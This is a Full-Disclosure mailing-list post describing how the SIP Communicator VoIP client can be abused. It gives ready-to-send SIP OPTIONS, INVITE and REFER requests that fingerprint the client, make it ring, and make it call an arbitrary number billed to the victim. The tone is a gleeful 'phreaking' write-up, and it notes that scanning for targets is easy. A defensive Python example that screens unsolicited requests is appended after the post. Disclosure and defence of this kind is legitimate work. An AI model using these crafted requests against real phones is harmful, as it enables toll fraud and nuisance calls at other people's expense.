Salve Full-Disclosure!

There is a nice open source software floating around for VoIP communication, namely "SIP Communicator". For phreakers' phun, the developers have not taken care of many security aspects when implementing the SIP protocol. Now as I got bored scanning around for open 5060 ports I decided to share my findings with you. Nice, eh?

SIP defines a whole bunch of messages to communicate with clients. Some of the more useful ones for me are OPTIONS and (of course) INVITE, and my personal favorite is definitely REFER. Funny things can also happen when using the MESSAGE type.

Short intro to SIP first... SIP is a protocol mostly used over UDP. It has an HTTP-like look and is used for session initiation of VoIP communication. It is used for signaling calls and host capabilities (i.e. supported protocols). Many other things can be done with SIP though. If you're interested, read http://www.ietf.org/rfc/rfc3261.txt.

Now, for the quick start, SIP defines the OPTIONS message to ask a client what is supported and what is not. An OPTIONS request might look like this (... means truncated for readability):

    OPTIONS sip:1234567890@snafu.com SIP/2.0
    Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d ...
    Max-Forwards: 70
    To:
    From: "A Friend" ;tag=70e763707a
    Call-ID: 112071fe7c
    CSeq: 63104 OPTIONS
    Contact:
    Accept: application/sdp
    Content-Length: 0

This is pretty much self-explanatory. The From line tells who is requesting the information, the To line says to whom it is sent. Now before responding, *good* SIP clients check if the To line matches the number that is really registered on the host. Well, *bad* clients don't :-) As you might guess, this is where it begins to get phunny... really, this is the single stupid point that makes a butterfly change the weather...

If you have a client running SIP Communicator you can easily use the above OPTIONS sample and (no matter what the From or To lines contain) it will honestly answer your request. It might respond with something like (... means truncated for readability):

    SIP/2.0 200 OK
    To: ;tag=df7a2b75
    Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d5d72ee20183d3d146797 ...
    CSeq: 63104 OPTIONS
    Call-ID: 112071fe7c
    From: "A Friend" ;tag=70e763707a
    Contact: "4461288"
    User-Agent: SIP Communicator1.0-alpha6-nightly.build.3041Windows 7
    Allow: INFO,OPTIONS,MESSAGE,BYE,REFER,ACK,CANCEL,NOTIFY,INVITE ...
    Allow-Events: refer
    Content-Length: 0

Not that interesting, you might say. But it tells you a lot! The "User-Agent" tells you that there is "SIP Communicator" running (and also the version up to the last bit - crazy!). Take a closer look at the "Contact" line. It tells you the LAN IP of the host, but don't care about it, it's useless for now. It further tells you the registrar and the phone number that are registered on the host. In this case it's "sip:4461288@sipgate.de". That's the host's "SIP identity". Keep this in mind.

Before we start the real phunny things let's just ring the phone a bit. All you need to make SIP Communicator ring is an INVITE message. As with OPTIONS, it will react to the message regardless of the To and From headers. So the following message might just do the job (... means truncated for readability):

    INVITE sip:1337@snafu.com:5060;transport=udp;registering_acc=sn ...
    Record-Route:
    Via: SIP/2.0/UDP 127.0.0.1;branch=stupidbranchtag
    From: "A Friend" ;tag=f5cb6e692d
    To:
    Contact:
    Call-ID: 2f6633739b@snafu.com
    CSeq: 102 INVITE
    Max-Forwards: 70
    Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
    Supported: replaces
    Content-Type: application/sdp
    Content-Length: 449

    v=0
    o=root 23830 23830 IN IP4 98.15.131.42
    s=session
    c=IN IP4 98.15.131.42
    t=0 0
    m=audio 35430 RTP/AVP 8 0 3 97 18 112 101
    a=rtpmap:8 PCMA/8000
    a=rtpmap:0 PCMU/8000
    a=rtpmap:3 GSM/8000
    a=rtpmap:97 iLBC/8000
    a=fmtp:97 mode=30
    a=rtpmap:18 G729/8000
    a=fmtp:18 annexb=no
    a=rtpmap:112 G726-32/8000
    a=rtpmap:101 telephone-event/8000
    a=fmtp:101 0-16
    a=silenceSupp:off - - - -
    a=ptime:20
    a=sendrecv
    a=direction:active
    a=nortpproxy:yes

And it turns out, SIP Communicator happily starts ringing just as if someone was calling. Ok, that is way phunny, but you know SIP is much more powerful.

A very interesting part of the SIP protocol defines the "REFER" message. That is some kind of relay message that tells a host "Please put me through to XYZ". Again, this is a very useful feature of SIP, but only when the VoIP software acts carefully when receiving these messages. As mentioned before, "SIP Communicator" doesn't handle that very restrictively. In contrast to an INVITE message, "SIP Communicator" needs correct values for the SIP ID of the host it resides on. So for constructing a valid REFER request we need the user's SIP ID. Remember the OPTIONS message and the "Contact" line in its response? We already got the ID! With this info and some enclosure we can construct a REFER request that lets SIP Communicator call an arbitrary telephone number. We use the origin's SIP ID for the REFER and Contact lines and construct a SIP ID from the phone number to call and the SIP provider of the client in the "Refer-To" line. We might want to call the number 1-800-FUCKYOU (that is 18003825968):

    REFER sip:4461288@sipgate.de SIP/2.0
    Via: SIP/2.0/UDP 1.2.3.4;branch=31f175a7e2d ...
    Max-Forwards: 70
    To:
    From: "A Friend" ;tag=ae894a32e8
    Call-ID: 5fae3cc039
    CSeq: 93809824 REFER
    Contact:
    Refer-To: sip:18003825968@sipgate.de
    Content-Length: 0

If you then get an answer that says "SIP/2.0 202 Accepted" you got it.

- PLEASE - be advised that calling a number from someone's SIP phone might generate costs on his bill. If the user using SIP Communicator has a prepaid account it might not even work if you try to call someone on the landline and there is not enough money available to make that call. Be nice and don't spend other people's money!!

There are not many SIP Communicator installations around that are reachable over the inet, so you can hardly find some hosts to attack. Instead you may find many other products responding to probes, but as far as I can tell they are all much better protected. Anyway, scanning for vulnerable hosts is an easy task because we're using UDP. No three-way handshake and nasty things. Just send and forget.

Maybe it is just the right time to dive deeper into SIP and VoIP things. New applications come out each day, the industry around that sector grows and grows, and SS7 and companions are still underdeveloped.

keep on phrocking,
stormrider

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
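The check the post attributes to *good* clients (the To header must match the identity actually registered on the host) together with a conservative REFER policy, written as an added Python example that is neither the post's nor SIP Communicator's code. The sample requests are constructed, the registered identity is the one shown in the OPTIONS response above, and refusing a REFER that arrives outside an existing dialog is the example's assumed hardening policy, not something the post states.

```python
import re

# Identity registered on the local phone (taken from the OPTIONS response above).
REGISTERED_AOR = "sip:4461288@sipgate.de"

def parse_request(raw: str):
    """Split a SIP request into (method, request_uri, {lower-cased header: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, request_uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, request_uri, headers

def header_uri(value: str) -> str:
    """Bare sip: URI from a To/From/Refer-To value, with or without <...> and ;params."""
    m = re.search(r"<([^>]*)>", value)
    uri = m.group(1) if m else value.split(";", 1)[0]
    return uri.strip().lower()

def screen_request(raw: str, active_dialogs: set):
    """Return (accept, status) for an incoming request. Two rules the post's
    'bad client' lacks: every request must be addressed to our own registered
    identity, and a REFER is only honoured inside a dialog we already have
    (known Call-ID); an unsolicited REFER would otherwise place an outbound
    call on our account. The out-of-dialog rule is this example's assumption."""
    method, _, h = parse_request(raw)
    if header_uri(h.get("to", "")) != REGISTERED_AOR:
        return False, "404 Not Found"
    if method == "REFER" and h.get("call-id") not in active_dialogs:
        return False, "403 Forbidden"
    return True, "200 OK"

# Constructed sample requests modelled on the ones in the post (not captured traffic).
PROBE = ("OPTIONS sip:1234567890@snafu.com SIP/2.0\r\n"
         "To: <sip:1234567890@snafu.com>\r\n"
         'From: "A Friend" <sip:probe@example.invalid>;tag=70e763707a\r\n'
         "Call-ID: 112071fe7c\r\nCSeq: 63104 OPTIONS\r\nContent-Length: 0\r\n\r\n")
REFER = ("REFER sip:4461288@sipgate.de SIP/2.0\r\n"
         "To: <sip:4461288@sipgate.de>\r\n"
         'From: "A Friend" <sip:probe@example.invalid>;tag=ae894a32e8\r\n'
         "Call-ID: 5fae3cc039\r\nCSeq: 93809824 REFER\r\n"
         "Refer-To: <sip:15551230000@sipgate.de>\r\nContent-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(screen_request(PROBE, set()))           # (False, '404 Not Found')
    print(screen_request(REFER, set()))           # (False, '403 Forbidden')
    print(screen_request(REFER, {"5fae3cc039"}))  # (True, '200 OK')
```

The same screening could be applied on a SIP-aware gateway in front of soft phones that lack the check themselves.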